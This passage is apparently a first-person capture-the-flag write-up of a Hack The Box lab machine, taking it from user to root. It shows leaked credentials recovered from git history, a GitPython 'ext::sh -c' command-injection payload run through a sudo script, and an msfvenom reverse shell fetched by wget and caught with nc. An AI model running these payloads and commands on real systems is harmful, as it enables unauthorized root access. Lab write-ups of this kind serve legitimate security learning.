Unfortunately, this user has no sudo permissions. Time to grab the user flag and do some more enumeration.
dev@editorial:~$ ls -la
total 36
drwxr-x--- 5 dev dev 4096 Apr 25 00:52 .
drwxr-xr-x 4 root root 4096 Jun 5 2024 ..
drwxrwxr-x 5 dev dev 4096 Apr 25 00:51 apps
lrwxrwxrwx 1 root root 9 Feb 6 2023 .bash_history -> /dev/null
-rw-r--r-- 1 dev dev 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 dev dev 3771 Jan 6 2022 .bashrc
drwx------ 2 dev dev 4096 Jun 5 2024 .cache
drwx------ 3 dev dev 4096 Apr 25 00:35 .gnupg
-rw-r--r-- 1 dev dev 807 Jan 6 2022 .profile
-rw-r----- 1 root dev 33 Apr 25 00:29 user.txt
dev@editorial:~$ cat user.txt
[FLAG REDACTED]
Looking around their home directory, we notice an app folder. Inside that lies a hidden .git folder.
dev@editorial:~$ ls -laR apps
apps:
total 12
drwxrwxr-x 3 dev dev 4096 Apr 25 00:54 .
drwxr-x--- 5 dev dev 4096 Apr 25 00:52 ..
drwxr-xr-x 9 dev dev 4096 Apr 25 00:48 .git
apps/.git:
total 60
drwxr-xr-x 9 dev dev 4096 Apr 25 00:48 .
drwxrwxr-x 3 dev dev 4096 Apr 25 00:54 ..
drwxr-xr-x 2 dev dev 4096 Jun 5 2024 branches
-rw-r--r-- 1 dev dev 253 Jun 4 2024 COMMIT_EDITMSG
-rw-r--r-- 1 dev dev 177 Apr 25 00:42 config
-rw-r--r-- 1 dev dev 73 Jun 4 2024 description
-rw-rw-r-- 1 dev dev 0 Apr 25 00:48 FETCH_HEAD
drwxrwxr-x 7 dev dev 4096 Apr 25 00:48 .git
-rw-r--r-- 1 dev dev 23 Jun 4 2024 HEAD
drwxr-xr-x 2 dev dev 4096 Jun 5 2024 hooks
-rw-r--r-- 1 dev dev 6163 Jun 4 2024 index
drwxr-xr-x 2 dev dev 4096 Jun 5 2024 info
drwxr-xr-x 3 dev dev 4096 Jun 5 2024 logs
drwxr-xr-x 70 dev dev 4096 Apr 25 00:48 objects
drwxr-xr-x 4 dev dev 4096 Jun 5 2024 refs
The git folder seems to be missing the application files. We might be able to restore those.
dev@editorial:~/apps$ ls
dev@editorial:~/apps$ git restore *
dev@editorial:~/apps$ ls
app_api app_editorial
dev@editorial:~/apps$
Sucess!
I dug around in the project files and couldn’t find anything. I tried Linpeas and manual enumeration as well and found nothing of value. I spent more time on this than I’d like to admit.
I decided to revisit the project files in the git repo and discovered that we can check git logs and view the commit history! Sometimes, a little –help is all you need!
dev@editorial:~/apps$ git log
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 21:04:21 2023 -0500
fix: bugfix in api port endpoint
commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 21:01:11 2023 -0500
change: remove debug and update api port
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 20:51:10 2023 -0500
feat: create api to editorial info
* It (will) contains internal info about the editorial, this enable
faster access to information.
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 20:48:43 2023 -0500
feat: create editorial app
* This contains the base of this project.
* Also we add a feature to enable to external authors send us their
books and validate a future post in our editorial.
Interesting! This code was downgraded from prod to dev at some point. Let’s take a look at that version.
dev@editorial:~/apps$ git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
Now we’re getting somewhere! Another set of credentials: prod:080217_Producti0n_2023!@
! Let’s use these and try to su to prod.
Enumeration of the “Prod” User
dev@editorial:~/apps$ su prod
Password:
prod@editorial:/home/dev/apps$
Checking sudo -l reveals a python script that we can run as root!
prod@editorial:/opt/internal_apps/clone_changes$ cd ~
prod@editorial:~$ sudo -l
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
Let’s check out the script:
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
I don’t see any sanitation for the user input, so I’m guessing this is vulnerable to command injection.
After a while of trying, and failing, to craft my own command injection payloads, I took to google and found this: https://github.com/gitpython-developers/GitPython/issues/1515
`'ext::sh -c touch% /tmp/pwned'`
Instead of using that, we’ll change the command to whoami to see if the privileges are kept during execution, as we would expect.
prod@editorial:/opt/internal_apps/clone_changes$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c whoami'
<SNIP>
stderr: 'Cloning into 'new_changes'...
fatal: protocol error: bad line length character: root
'
Beautiful! It looks like the injection is working and is executing as root.
Now to craft a shell. Instead of messing with the injection syntax and the odd “%” separator, I just made an executable reverse shell with msfvenom on my attack box.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=4242 -f elf -o reverse.elf
I used a python HTTP server to host the file on my attack box, then used wget on the target to download it into the /tmp/ directory. After that, I set the file as executable.
Now we’ll start a listener on our attack box:
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
Then try our payload and cross our fingers:
Target:
prod@editorial:/opt/internal_apps/clone_changes$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c /tmp/reverse.elf'
Attack box:
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.20] 46438
whoami
root
cat /root/root.txt
[FLAG REDACTED]
Success! I immediately received a root shell and was able to grab the flag!
Rooting the box was great, but the real fun was learning through the mistakes, frustration, and experiments.
This is my first published write-up, and I wanted it to reflect the real process — messy, challenging, and full of lessons.
Thanks for coming along for the ride!